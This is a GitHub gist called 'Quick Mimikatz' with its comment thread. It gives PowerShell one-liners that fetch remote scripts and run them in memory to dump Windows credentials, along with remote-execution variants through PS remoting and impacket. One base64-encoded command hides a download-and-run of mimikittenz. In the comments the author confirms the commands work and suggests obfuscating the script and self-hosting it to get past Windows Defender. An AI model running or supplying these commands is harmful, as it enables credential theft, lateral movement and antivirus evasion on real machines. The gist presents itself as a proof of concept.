Skip to content

Instantly share code, notes, and snippets.

Last active May 14, 2024 14:31
Show Gist options
  • Save gfoss/ca6aa37f97fd400ff14f to your computer and use it in GitHub Desktop.
Save gfoss/ca6aa37f97fd400ff14f to your computer and use it in GitHub Desktop.
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
#ps remoting [remote]
Invoke-Command -ComputerName <IP-Address> -ScriptBlock {powershell etc...}
#impacket's [remote] <USER:PASSWORD@IP-Address> "powershell -enc powershell etc..."
#mimikittenz [local]
IEX (New-Object Net.WebClient).DownloadString(''); Invoke-mimikittenz
#encoded-mimikittenz [local]
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==
Copy link

gfoss commented Jul 15, 2019

Thanks, @tuv7041, I just tested and verified - great fix! I've updated the gist to reflect this change.

Copy link

Seems like this no longer works on Windows 10.

Copy link

gfoss commented Jan 3, 2020

Thanks for the heads-up @clintonm9 - I've updated the gist with the newer version of Invoke-Mimikatz, available in Empire 3.0:

I've also modified the command slightly, to include 'Invoke-Mimikatz -Command privilege::debug;'. I've tested this successfully on the latest version of Windows 10, fully patched, etc. However this vulnerability could be locked down via organizational policy.

Copy link

Thanks for updating. I tried again and still got error messages for "This script contains malicious content and has been blocked by your antivirus software.". Both "#mimikatz [local]" and "#encoded-mimikatz [local]". It might be on my end or a misunderstanding of how the environment needs to be setup.

Copy link

gfoss commented Jan 3, 2020

Yeah - if you have Windows Defender enabled, this will not work, unfortunately. They flag on mimikatz in all the many ways you can utilize the tool... One method that still works is obfuscating the Invoke-Mimikatz.ps1 script and hosting this on your own server. That is outside of the scope of this gist though, this is mainly to show how mimikatz works via quick proof of concept.

Copy link

rexbutz commented Jan 11, 2022

These seem to no longer be working now.

Copy link

gfoss commented Jan 12, 2022

Thanks for the heads-up @rexbutz! I've updated this to point to the correct Empire repository and have verified that the attack now works as intended. That said, it will only be successful if Microsoft's real-time protection is disabled, other antivirus software is in use, or you get creative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment